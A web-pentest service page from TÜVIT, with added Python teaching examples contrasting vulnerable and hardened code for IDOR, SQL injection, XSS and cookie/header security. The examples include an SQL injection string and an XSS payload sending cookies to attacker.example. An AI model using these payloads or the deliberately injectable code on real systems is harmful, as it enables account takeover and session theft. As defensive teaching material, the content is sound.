
Web Application Security

Web Pentest

Penetration tests for web applications and backend systems

If web applications and backend systems are not adequately protected, they become targets for attackers, putting sensitive customer data and internal company networks at risk. With customised penetration tests (pentests), we support you in securing your web applications and backend systems against cyberattacks and data theft.

[Image: a man sits at a desk with two screens and analyses data.]

Best possible protection for your web application

Through penetration tests, we uncover vulnerabilities and potential security gaps in your web application and backend system before others do.

Testing at system and network level

Using port and vulnerability scans, we also check the security of the underlying backend system (web server) of the web application.

Documentation & recommendations for action

You receive all the results in the form of a detailed and informative test report, including appropriate recommendations for action to eliminate weak points.

What is a Web Pentest?

Web pentesting (web application penetration testing) is an IT security measure used to check the security of web applications.

The aim is to uncover existing security vulnerabilities and possible points of attack in the web application and to increase the security of the web application in this way. Methods and means are used that real attackers would also use.

Your benefits at a glance

Penetration tests for secure web applications

Secure web applications are essential for protecting sensitive data and safeguarding business-critical processes. Penetration tests specifically uncover vulnerabilities and thus help to minimise security risks at an early stage.

  • One step ahead of attackers
    Pentests identify security gaps and vulnerabilities before criminals can exploit them for their own purposes.
  • Pentests based on recognised standards
    Our experts test the security of your web application according to recognised standards and guidelines.
  • Security at all web application levels
    In addition to the frontend, our experts also check the security of the backend system (web server).
  • Continuous improvement
    Penetration tests help you uncover potential improvements to your web application.
  • Increase IT security, minimise risks
    Pentests help you to improve the security of your web application & reduce the risk of attacks.
  • Trust with customers & business partners
    An independent security analysis of your web application strengthens the trust of your customers & business partners.
  • Focus on your day-to-day business
    Focus on your business while our experts scrutinise your application.
  • Protection against financial & reputational damage
    Prevention instead of remediation: pentests help you prevent attacks and the damage associated with them.

Procedure for a pentest against a web application

1

Preparation & Kickoff

Clarification of technical and organisational features and requirements.

2

Information gathering & analysis

Determination of basic information about the test object.

3

Carrying out penetration tests

Analysis of the selected web application based on the information collected.

4

Final report

Summary of all results of the audit in the form of a final report.

5

Optional: Re-test

Check whether the implemented improvement and defence measures are effective.

TÜV NORD IT Secure Communication | Berlin
TÜV Informationstechnik | Essen

What is investigated

As part of penetration tests (including backend systems, web services, and APIs), the respective web application is examined for the most critical or most frequently exploited security risks.

Access control (authorisation) / client separation: If access rights for authenticated users are not enforced correctly, attackers may be able to access functions or data of other users. This also includes cross-client (cross-tenant) access, where a user of one customer reaches the data of another.
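The following is an added example (not code from this page or from TÜVIT) of the authorisation failure described above and its fix. The User and Invoice records and the INVOICES table are constructed sample data; the field and function names are assumptions made for the illustration.

```python
"""Object-level authorisation and tenant separation (IDOR / cross-client access).

Added example, not code from the page. INVOICES holds constructed sample data:
two tenants (customers of the operator), three users, three invoices.
"""
from dataclasses import dataclass
from typing import Dict, Optional


@dataclass(frozen=True)
class User:
    user_id: int
    tenant_id: int
    role: str  # "customer" or "admin" (admin of their own tenant only)


@dataclass(frozen=True)
class Invoice:
    invoice_id: int
    tenant_id: int
    owner_id: int
    amount: float


# Constructed sample data (assumption: invoice ids are sequential and guessable).
INVOICES: Dict[int, Invoice] = {
    1001: Invoice(1001, tenant_id=1, owner_id=10, amount=120.0),
    1002: Invoice(1002, tenant_id=1, owner_id=11, amount=80.0),
    2001: Invoice(2001, tenant_id=2, owner_id=20, amount=999.0),
}


def get_invoice_unsafe(session_user: User, invoice_id: int) -> Optional[Invoice]:
    """Vulnerable: being authenticated is treated as being authorised.

    Any logged-in user can read any invoice by iterating over ids
    (insecure direct object reference), including invoices of other
    tenants, which is exactly the cross-client access a pentest probes for.
    """
    return INVOICES.get(invoice_id)


def get_invoice(session_user: User, invoice_id: int) -> Optional[Invoice]:
    """Hardened: the lookup is scoped to the caller's tenant, and inside the
    tenant the record must belong to the caller unless the caller is an admin.

    A record outside the caller's scope is answered as 'not found' rather
    than 'forbidden', so the response does not confirm that the id exists.
    """
    inv = INVOICES.get(invoice_id)
    if inv is None or inv.tenant_id != session_user.tenant_id:
        return None
    if session_user.role != "admin" and inv.owner_id != session_user.user_id:
        return None
    return inv


def idor_sweep(session_user: User, lookup) -> Dict[int, bool]:
    """What a tester does: enumerate candidate ids with one user's session and
    record which ones the given lookup function hands back."""
    return {iid: lookup(session_user, iid) is not None for iid in sorted(INVOICES)}


if __name__ == "__main__":
    mallory = User(user_id=20, tenant_id=2, role="customer")
    print("unsafe:", idor_sweep(mallory, get_invoice_unsafe))
    print("hardened:", idor_sweep(mallory, get_invoice))
```

Running the sweep with a user of tenant 2 against the unsafe lookup returns every invoice, including those of tenant 1; against the hardened lookup only that user's own invoice comes back. The check is placed in the data access function rather than in the route handler so that every code path that reads invoices inherits it.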

Input & output validation: If user input is not sufficiently validated, injection vulnerabilities (e.g. cross-site scripting (XSS), XML External Entities (XXE), SQL injection) can lead to data loss, data corruption or system takeover (remote code execution), among other things. Injection attacks attempt to get attacker-controlled input interpreted as code or commands by the application or one of its components (database, XML parser, browser). Output encoding matters as much as input validation: XSS arises wherever untrusted data is written into a page without being encoded for that context.
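As an added example (not code from this page or from TÜVIT), the two most common injection classes named above side by side with their fixes: an SQL query built by string concatenation versus bound parameters, and a comment rendered into HTML unencoded versus HTML-escaped. The in-memory SQLite table and its single user row are constructed sample data; the function names are assumptions.

```python
"""SQL injection and cross-site scripting: vulnerable and hardened forms.

Added example, not code from the page. make_db() builds constructed sample
data in an in-memory SQLite database. The *_unsafe functions are kept
deliberately vulnerable to show the attack; the hardened ones show the fix.
"""
import html
import sqlite3
from typing import Optional


def make_db() -> sqlite3.Connection:
    """Constructed sample data. Storing a plaintext password is itself bad
    practice; it is only done here to keep the injection demonstration short."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, password TEXT)")
    conn.execute("INSERT INTO users (name, password) VALUES ('admin', 'correct horse')")
    conn.commit()
    return conn


def login_unsafe(conn: sqlite3.Connection, username: str, password: str) -> Optional[str]:
    """Vulnerable: user input is concatenated into the SQL text, so the
    password field can rewrite the WHERE clause."""
    query = (
        "SELECT name FROM users WHERE name = '" + username
        + "' AND password = '" + password + "'"
    )
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def login_safe(conn: sqlite3.Connection, username: str, password: str) -> Optional[str]:
    """Hardened: bound parameters. The driver passes the values separately
    from the statement, so they can never become part of the SQL grammar."""
    row = conn.execute(
        "SELECT name FROM users WHERE name = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


def render_comment_unsafe(comment: str) -> str:
    """Vulnerable: untrusted text is placed into the HTML body unencoded,
    so a stored comment can carry a script into every viewer's browser."""
    return '<p class="comment">' + comment + "</p>"


def render_comment_safe(comment: str) -> str:
    """Hardened: the text is encoded for the HTML text context it lands in.
    (An attribute or JavaScript context would need its own encoding.)"""
    return '<p class="comment">' + html.escape(comment, quote=True) + "</p>"


# Constructed attack payloads used in the demonstration below.
SQLI_PAYLOAD = "' OR '1'='1"
XSS_PAYLOAD = "<script>document.location='https://attacker.example/?c='+document.cookie</script>"


if __name__ == "__main__":
    db = make_db()
    # The unsafe query becomes: ... AND password = '' OR '1'='1' -> always true.
    print("unsafe login with SQLi payload:", login_unsafe(db, "admin", SQLI_PAYLOAD))
    print("safe login with SQLi payload:  ", login_safe(db, "admin", SQLI_PAYLOAD))
    print(render_comment_unsafe(XSS_PAYLOAD))
    print(render_comment_safe(XSS_PAYLOAD))
```

With the payload in the password field, the concatenated query reads `... AND password = '' OR '1'='1'`; the OR makes the WHERE clause true for every row and the attacker is logged in as the first user without knowing any password. The parameterised version compares the literal string and finds no match. Note that output encoding is context-specific: `html.escape` is correct for element text, not for data that ends up inside a `<script>` block or a URL.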

Security-related misconfiguration / hardening: Components with known vulnerabilities, default accounts, unused (sample, test) pages or misconfigurations etc. may make it possible to gain unauthorised access to sensitive information or to the underlying system (web server).

Disclosure of security-relevant information (information gathering/disclosure): Websites and responses from web applications and web services can contain security-relevant information (e.g. version details), which attackers can use to bypass security mechanisms and exploit vulnerabilities.

Investigations at network level: The penetration test includes a check at network level of the web application's web server (a single IP address). Port scans, a check of the SSL/TLS configuration and vulnerability scans are carried out.

Authentication / session management: Errors in authentication and session management may allow attackers to assume the identity of other users, e.g. by means of brute force attacks, weak session IDs or the use of insecure passwords.

Data security: The web application must be configured so that it can only be reached via the intended, secure (encrypted) communication paths, and access to resources and functions that are not required must be restricted. Typical controls are cookie flags (Secure, HttpOnly, SameSite) and HTTP security headers (e.g. Strict-Transport-Security, Content-Security-Policy).
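The following added example (not code from this page or from TÜVIT) covers the two preceding points together, session management and data security: it contrasts a predictable session identifier with one drawn from the OS random source, issues the session cookie with the flags named above, and runs a small header and cookie audit of the kind a tester performs on every response. The two HTTP responses are constructed samples, not captured traffic, and the header baseline in REQUIRED_HEADERS is a common minimum, not the page's own checklist.

```python
"""Session IDs, cookie flags and HTTP security headers, with a response audit.

Added example, not code from the page. WEAK_RESPONSE and HARDENED_RESPONSE are
constructed sample responses; REQUIRED_HEADERS is an assumed baseline.
"""
import secrets
from typing import Dict, List, Tuple

Headers = List[Tuple[str, str]]


def weak_session_id(counter: int) -> str:
    """What a tester looks for: a sequential id lets an attacker guess
    neighbouring sessions and take over other users' logins."""
    return f"sess-{counter:08d}"


def strong_session_id() -> str:
    """256 bits from the OS CSPRNG, URL-safe base64 (43 characters)."""
    return secrets.token_urlsafe(32)


def session_cookie(session_id: str) -> str:
    """Set-Cookie value carrying the flags a session cookie should have:
    Secure (TLS only), HttpOnly (no script access), SameSite (CSRF limit)."""
    return f"sid={session_id}; Path=/; Secure; HttpOnly; SameSite=Strict"


# Assumed baseline; a CSP frame-ancestors directive is an accepted
# alternative to X-Frame-Options, which is why that case is special-cased below.
REQUIRED_HEADERS = {
    "strict-transport-security": "HSTS missing: downgrade to plain HTTP possible",
    "content-security-policy": "CSP missing: no mitigation for injected scripts",
    "x-content-type-options": "X-Content-Type-Options missing: MIME sniffing possible",
    "x-frame-options": "X-Frame-Options missing: clickjacking possible",
}
REQUIRED_COOKIE_FLAGS = ("secure", "httponly", "samesite")


def audit_response(headers: Headers) -> List[str]:
    """Return one finding per missing control, in the order checked."""
    findings: List[str] = []
    by_name: Dict[str, str] = {k.lower(): v for k, v in headers}
    for name, message in REQUIRED_HEADERS.items():
        if name in by_name:
            continue
        if name == "x-frame-options" and "frame-ancestors" in by_name.get(
            "content-security-policy", ""
        ):
            continue
        findings.append(message)
    # Version disclosure (see "information disclosure" above): a Server
    # header containing a digit is usually a product version.
    server = by_name.get("server", "")
    if any(ch.isdigit() for ch in server):
        findings.append(f"Server header discloses version: {server}")
    for name, value in headers:
        if name.lower() != "set-cookie":
            continue
        cookie_name = value.split("=", 1)[0].strip()
        attrs = [part.strip().lower() for part in value.split(";")[1:]]
        for flag in REQUIRED_COOKIE_FLAGS:
            if not any(a == flag or a.startswith(flag + "=") for a in attrs):
                findings.append(f"Cookie {cookie_name} lacks {flag}")
    return findings


# Constructed sample: typical default deployment.
WEAK_RESPONSE: Headers = [
    ("Server", "Apache/2.4.41 (Ubuntu)"),
    ("Set-Cookie", "sid=" + weak_session_id(42) + "; Path=/"),
    ("Content-Type", "text/html"),
]

# Constructed sample: the same response after hardening.
HARDENED_RESPONSE: Headers = [
    ("Server", "web"),
    ("Strict-Transport-Security", "max-age=63072000; includeSubDomains"),
    ("Content-Security-Policy", "default-src 'self'; frame-ancestors 'none'"),
    ("X-Content-Type-Options", "nosniff"),
    ("Set-Cookie", session_cookie(strong_session_id())),
    ("Content-Type", "text/html"),
]


if __name__ == "__main__":
    for finding in audit_response(WEAK_RESPONSE):
        print("weak:", finding)
    print("hardened:", audit_response(HARDENED_RESPONSE) or "no findings")
```

The weak response yields eight findings: four missing headers, a version-disclosing Server header, and a session cookie without Secure, HttpOnly or SameSite. The hardened response yields none; it omits X-Frame-Options but satisfies the clickjacking check through `frame-ancestors` in its CSP. Audits like this are a starting point only: a present header with a permissive value (e.g. a CSP that allows `unsafe-inline`) still needs a human look.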

Business/application logic: In multi-step business processes, care must be taken to ensure that the implemented application logic cannot be misused (e.g. skipping or breaking out of an intended registration or checkout flow).

Cryptography / SSL and TLS: If there are vulnerabilities in the SSL/TLS configuration, the probability increases that potential attackers can read transmitted data (confidentiality), manipulate it (integrity) and impersonate a legitimate trusted party/service without authorisation (authenticity) and thus successfully carry out man-in-the-middle attacks, for example.

Data protection: In addition to the technical checks, the web application (incl. backend system) can also be checked for data protection aspects, e.g. implementation of privacy by design, fulfilment of data protection principles, etc.

Frequently Asked Questions (FAQ)

What you need to know about web pentests

The test report is always prepared by our experts individually and in an easily understandable form (no automatic generation) and contains at least the following information:

  • Introduction: Brief description of the test object, objective of the pentest and documentation of special features during the investigation.
  • Management/Executive Summary: Summary of the results and assessment of the overall security level.
  • Risk assessment: Assignment of a risk level to each vulnerability (informative, low, medium, high or critical risk), which describes the criticality of the respective vulnerability.
  • Clear presentation: Clear presentation of all identified vulnerabilities in a table as well as in a risk bar chart, which shows the number of vulnerabilities per risk level.
  • Detailed description of vulnerabilities & proof-of-concept: For each vulnerability, there is an individual description that shows exactly how the vulnerability was found and how it can be exploited by an attacker (proof-of-concept).
  • Evaluation of automated tests: The results of the automated tests are evaluated by the TÜVIT security experts, checked for false positives and then summarised in the report.
  • Recommendation of measures to eliminate the vulnerability: For each vulnerability, there is a recommendation of measures to eliminate the vulnerability.
  • References: If available, we provide references to vulnerability databases (e.g. CVE).
  • Technical attachments : If available, further information and files on the tests carried out are provided as attachments, e.g. the raw results of the port and vulnerability scans.

  • Black box
    Pentest without additional information
  • Grey box (standard)
    Pentest with additional information, e.g. test access data and (API) documentation
  • White box
    Pentest with additional information, e.g. architecture/design documents, communication matrix or source code in addition to test access data

The approach of the TÜVIT security experts is based on the OWASP Application Security Verification Standard (ASVS), which describes basic security requirements for web applications and backend systems, and the OWASP Web Security Testing Guide (WSTG), which describes how the requirements from the ASVS can be verified. Furthermore, the OWASP Top 10 vulnerabilities for web applications and the implementation concept for penetration tests from the BSI are used, and finally the OWASP Best Practices approach

The costs depend on the complexity of the test object. A spot check is in the lower to mid four-figure range. For an exact price indication, we need more information about your web application and your backend system.

The duration of the test depends on the type of test selected (Level 1 to 3), see above. Independently of the actual testing time, a period of at least 1 week is assumed for the Spot Check (Level 1) and at least 2 weeks for the Regular (Level 2) and Advanced (Level 3) pentests.

Why we are a strong partner for you

Good reasons that speak in our favour

Optimally secured

Three areas of application – three penetration tests

Whether security risks in web applications, mobile apps or in IT infrastructure: you are on the safe side with the right pentest procedure.